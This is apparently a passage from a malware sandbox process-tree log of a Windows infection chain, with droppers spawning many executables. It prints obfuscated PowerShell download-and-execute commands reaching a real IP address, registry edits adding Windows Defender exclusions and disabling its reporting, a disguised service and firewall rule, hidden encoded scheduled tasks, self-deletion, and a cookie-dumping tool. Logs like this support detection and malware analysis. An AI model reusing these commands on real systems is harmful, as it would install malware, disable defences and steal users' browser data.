- Suspicious use of SetWindowsHookEx
PID:4912

C:\Users\Admin\Pictures\Adobe Films\585WZ5oegGODOHtxXkp4vulx.exe
"C:\Users\Admin\Pictures\Adobe Films\585WZ5oegGODOHtxXkp4vulx.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1288 -s 460
4⤵
- Program crash
PID:1952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1288 -s 504
4⤵
- Program crash
PID:3628

C:\Users\Admin\Pictures\Adobe Films\rU5pGOi7qyJAO8IGAKODku_I.exe
"C:\Users\Admin\Pictures\Adobe Films\rU5pGOi7qyJAO8IGAKODku_I.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4024

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\mzrnzsv.exe" C:\Windows\SysWOW64\kbionima\
4⤵
PID:5556

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\kbionima\
4⤵
PID:5236

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create kbionima binPath= "C:\Windows\SysWOW64\kbionima\mzrnzsv.exe /d\"C:\Users\Admin\Pictures\Adobe Films\rU5pGOi7qyJAO8IGAKODku_I.exe\"" type= own start= auto DisplayName= "wifi support"
4⤵
PID:5928

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description kbionima "wifi internet conection"
4⤵
PID:6104

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start kbionima
4⤵
PID:4040

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
4⤵
PID:1156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4024 -s 1040
4⤵
- Program crash
PID:2136

C:\Users\Admin\Pictures\Adobe Films\yuV8JaQkflxpgPaEr5wmHrHU.exe
"C:\Users\Admin\Pictures\Adobe Films\yuV8JaQkflxpgPaEr5wmHrHU.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:3828

C:\Users\Admin\Pictures\Adobe Films\6TW3uUNZSGdw7jPBeCzlHQXm.exe
"C:\Users\Admin\Pictures\Adobe Films\6TW3uUNZSGdw7jPBeCzlHQXm.exe"
3⤵
PID:4060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4060 -s 460
4⤵
- Program crash
PID:2708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4060 -s 468
4⤵
- Program crash
PID:1332

C:\Users\Admin\Pictures\Adobe Films\2Sr8vhAo0wxpWZEkp1nO29eX.exe
"C:\Users\Admin\Pictures\Adobe Films\2Sr8vhAo0wxpWZEkp1nO29eX.exe"
3⤵
- Executes dropped EXE
PID:3840

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/SkyDrive.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:2892

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:4788

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/Offer/Offer.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:1724

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/Fax.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:1884

C:\Users\Admin\Pictures\Adobe Films\6Dle_A69lpNXU_A8LIIjG82c.exe
"C:\Users\Admin\Pictures\Adobe Films\6Dle_A69lpNXU_A8LIIjG82c.exe"
3⤵
- Executes dropped EXE
PID:3720

C:\Users\Admin\Pictures\Adobe Films\_KprUxb_aP2eE5NFB2PAmsTf.exe
"C:\Users\Admin\Pictures\Adobe Films\_KprUxb_aP2eE5NFB2PAmsTf.exe"
3⤵
- Executes dropped EXE
PID:1100

C:\Users\Admin\AppData\Local\Temp\7zSDA6A.tmp\Install.exe
.\Install.exe
4⤵
PID:408

C:\Users\Admin\AppData\Local\Temp\7zSEDA4.tmp\Install.exe
.\Install.exe /S /site_id "525403"
5⤵
PID:5032

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
6⤵
PID:5292

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
7⤵
PID:3728

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
8⤵
PID:4324

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
8⤵
PID:1292

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
6⤵
PID:3252

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
7⤵
PID:3768

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
8⤵
PID:5932

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
8⤵
PID:5804

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gyagKMxqJ" /SC once /ST 07:03:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
6⤵
- Creates scheduled task(s)
PID:4896

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gyagKMxqJ"
6⤵
PID:4612

C:\Users\Admin\Pictures\Adobe Films\9LNKKNETc8v_BwrTQLVF0weQ.exe
"C:\Users\Admin\Pictures\Adobe Films\9LNKKNETc8v_BwrTQLVF0weQ.exe"
3⤵
PID:2600

C:\Users\Admin\Pictures\Adobe Films\T_xxcWtUW1rS5NZBq5PQSIc1.exe
"C:\Users\Admin\Pictures\Adobe Films\T_xxcWtUW1rS5NZBq5PQSIc1.exe"
3⤵
- Executes dropped EXE
PID:1092

C:\Users\Admin\Pictures\Adobe Films\e7rUYYQ6omMv05JKEC1mSxA4.exe
"C:\Users\Admin\Pictures\Adobe Films\e7rUYYQ6omMv05JKEC1mSxA4.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1508 -s 456
4⤵
- Program crash
PID:4152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1508 -s 468
4⤵
- Program crash
PID:392

C:\Users\Admin\Pictures\Adobe Films\YRVbTmCQMqPXQ19Ies9fEBwl.exe
"C:\Users\Admin\Pictures\Adobe Films\YRVbTmCQMqPXQ19Ies9fEBwl.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3108

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im YRVbTmCQMqPXQ19Ies9fEBwl.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\YRVbTmCQMqPXQ19Ies9fEBwl.exe" & del C:\ProgramData\*.dll & exit
4⤵
PID:2000

C:\Windows\SysWOW64\taskkill.exe
taskkill /im YRVbTmCQMqPXQ19Ies9fEBwl.exe /f
5⤵
- Kills process with taskkill
PID:5396

C:\Users\Admin\Pictures\Adobe Films\HOKnoPFdltTtIbOUvX6L1Ept.exe
"C:\Users\Admin\Pictures\Adobe Films\HOKnoPFdltTtIbOUvX6L1Ept.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4048

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:5268

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:5260

C:\Users\Admin\Documents\2UG7UHXwn2AU79Z6Odci7jem.exe
"C:\Users\Admin\Documents\2UG7UHXwn2AU79Z6Odci7jem.exe"
4⤵
PID:5188

C:\Users\Admin\Pictures\Adobe Films\kfN8ETWJ63pYYmyeA3Oy3Lwp.exe
"C:\Users\Admin\Pictures\Adobe Films\kfN8ETWJ63pYYmyeA3Oy3Lwp.exe"
5⤵
PID:4152

C:\Users\Admin\Pictures\Adobe Films\L6OHZCQyCbgFVC65Tec4RaSL.exe
"C:\Users\Admin\Pictures\Adobe Films\L6OHZCQyCbgFVC65Tec4RaSL.exe"
5⤵
PID:5920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 616
6⤵
PID:5132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 624
6⤵
PID:5976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 656
6⤵
PID:3536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 812
6⤵
PID:660

C:\Users\Admin\Pictures\Adobe Films\GYYOAAqYb53Pp75Lhp6L9dcP.exe
"C:\Users\Admin\Pictures\Adobe Films\GYYOAAqYb53Pp75Lhp6L9dcP.exe"
5⤵
PID:6036

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" .\a6U_WGm.9B
6⤵
PID:5552

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\a6U_WGm.9B
7⤵
PID:5568

C:\Users\Admin\Pictures\Adobe Films\3DsH9uhpzG96vKKkV865J3w6.exe
"C:\Users\Admin\Pictures\Adobe Films\3DsH9uhpzG96vKKkV865J3w6.exe"
5⤵
PID:6056

C:\Users\Admin\Pictures\Adobe Films\al7wxXYdbVoMdx_pazHqN40U.exe
"C:\Users\Admin\Pictures\Adobe Films\al7wxXYdbVoMdx_pazHqN40U.exe"
5⤵
PID:1420

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
6⤵
PID:1828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1420 -s 608
6⤵
PID:2580

C:\Users\Admin\Pictures\Adobe Films\U3O3JxYK96zBOEjOpAmaj8IS.exe
"C:\Users\Admin\Pictures\Adobe Films\U3O3JxYK96zBOEjOpAmaj8IS.exe"
5⤵
PID:5852

C:\Users\Admin\AppData\Local\Temp\7zS4DD5.tmp\Install.exe
.\Install.exe
6⤵
PID:4516

C:\Users\Admin\AppData\Local\Temp\7zS884E.tmp\Install.exe
.\Install.exe /S /site_id "525403"
7⤵
PID:2524

C:\Users\Admin\Pictures\Adobe Films\a6iIwAM00BcqafzWtnjwB513.exe
"C:\Users\Admin\Pictures\Adobe Films\a6iIwAM00BcqafzWtnjwB513.exe"
5⤵
PID:6088

C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr2249.exe
"C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr2249.exe"
6⤵
PID:5764

C:\Users\Admin\AppData\Local\Temp\KHII6.exe
"C:\Users\Admin\AppData\Local\Temp\KHII6.exe"
7⤵
PID:4368

C:\Users\Admin\AppData\Local\Temp\D82I9.exe
"C:\Users\Admin\AppData\Local\Temp\D82I9.exe"
7⤵
PID:2224

C:\Users\Admin\AppData\Local\Temp\M01HC.exe
"C:\Users\Admin\AppData\Local\Temp\M01HC.exe"
7⤵
PID:6136

C:\Users\Admin\AppData\Local\Temp\GD6FC.exe
"C:\Users\Admin\AppData\Local\Temp\GD6FC.exe"
7⤵
PID:5340

C:\Users\Admin\AppData\Local\Temp\9KC8F.exe
"C:\Users\Admin\AppData\Local\Temp\9KC8F.exe"
7⤵
PID:2968

C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall238497.exe
"C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall238497.exe"
6⤵
PID:2088

C:\Users\Admin\AppData\Local\Temp\xuemeili.exe
"C:\Users\Admin\AppData\Local\Temp\xuemeili.exe"
6⤵
PID:5108

C:\Users\Admin\AppData\Local\Temp\xuemeili.exe
"C:\Users\Admin\AppData\Local\Temp\xuemeili.exe" -h
7⤵
PID:5636

C:\Users\Admin\AppData\Local\Temp\tvstream17.exe
"C:\Users\Admin\AppData\Local\Temp\tvstream17.exe"
6⤵
PID:4024

C:\Users\Admin\AppData\Local\Temp\pub1.exe
"C:\Users\Admin\AppData\Local\Temp\pub1.exe"
6⤵
PID:2584

C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe
"C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe"
6⤵
PID:1160

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
6⤵
PID:4432

C:\Users\Admin\Pictures\Adobe Films\xNhQTlVNHSkmLF7GCZkFJiTd.exe
"C:\Users\Admin\Pictures\Adobe Films\xNhQTlVNHSkmLF7GCZkFJiTd.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:524

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
4⤵
PID:5116

C:\Windows\SysWOW64\cmd.exe
cmd
5⤵
PID:2440

C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
"C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"
2⤵
- Executes dropped EXE
PID:3760

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1208

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:3620

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4060

C:\Users\Admin\AppData\Local\Temp\pub2.exe
"C:\Users\Admin\AppData\Local\Temp\pub2.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1676

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1536

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:3988

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3696

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4816

C:\Windows\SysWOW64\rundll32.exe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
2⤵
- Loads dropped DLL
PID:2940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2940 -s 572
3⤵
- Program crash
PID:2996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2940 -ip 2940
1⤵
PID:4700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3656 -ip 3656
1⤵
PID:3868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3656 -ip 3656
1⤵
PID:3700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3656 -ip 3656
1⤵
PID:2600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3656 -ip 3656
1⤵
PID:1420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3656 -ip 3656
1⤵
PID:648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3656 -ip 3656
1⤵
PID:4704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3656 -ip 3656
1⤵
PID:2380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3656 -ip 3656
1⤵
PID:1708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3656 -ip 3656
1⤵
PID:2328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3656 -ip 3656
1⤵
PID:1792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3656 -ip 3656
1⤵
PID:2216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3656 -ip 3656
1⤵
PID:864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3656 -ip 3656
1⤵
PID:624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3656 -ip 3656
1⤵
PID:2080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3656 -ip 3656
1⤵
PID:1508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3656 -ip 3656
1⤵
PID:3852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3656 -ip 3656
1⤵
PID:3648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3656 -ip 3656
1⤵
PID:4952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3656 -ip 3656
1⤵
PID:4772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3656 -ip 3656
1⤵
PID:4836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3656 -ip 3656
1⤵
PID:4728

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:3660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4436 -ip 4436
1⤵
PID:3052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4436 -ip 4436
1⤵
PID:4048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4436 -ip 4436
1⤵
PID:3568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4436 -ip 4436
1⤵
PID:3644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4436 -ip 4436
1⤵
PID:4516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4436 -ip 4436
1⤵
PID:3728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4436 -ip 4436
1⤵
PID:5068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4436 -ip 4436
1⤵
PID:1804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4436 -ip 4436
1⤵
PID:2892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4436 -ip 4436
1⤵
PID:3876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4436 -ip 4436
1⤵
PID:3700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4436 -ip 4436
1⤵
PID:3544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4436 -ip 4436
1⤵
PID:760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4436 -ip 4436
1⤵
PID:864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4436 -ip 4436
1⤵
PID:3840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4436 -ip 4436
1⤵
PID:1388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1232 -ip 1232
1⤵
PID:4152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1232 -ip 1232
1⤵
PID:2696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1232 -ip 1232
1⤵
PID:2920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1232 -ip 1232
1⤵
PID:4904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1232 -ip 1232
1⤵
PID:2180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1232 -ip 1232
1⤵
PID:2188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1232 -ip 1232
1⤵
PID:1332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1232 -ip 1232
1⤵
PID:1664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1232 -ip 1232
1⤵
PID:4636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1232 -ip 1232
1⤵
PID:1120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1508 -ip 1508
1⤵
PID:3964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1288 -ip 1288
1⤵
PID:2404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4060 -ip 4060
1⤵
PID:1956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 428 -ip 428
1⤵
PID:2468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1508 -ip 1508
1⤵
PID:2756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1288 -ip 1288
1⤵
PID:3784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4060 -ip 4060
1⤵
PID:3772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 428 -ip 428
1⤵
PID:4812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2724 -ip 2724
1⤵
PID:5500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 428 -ip 428
1⤵
PID:5672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 5128 -ip 5128
1⤵
PID:5364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1232 -ip 1232
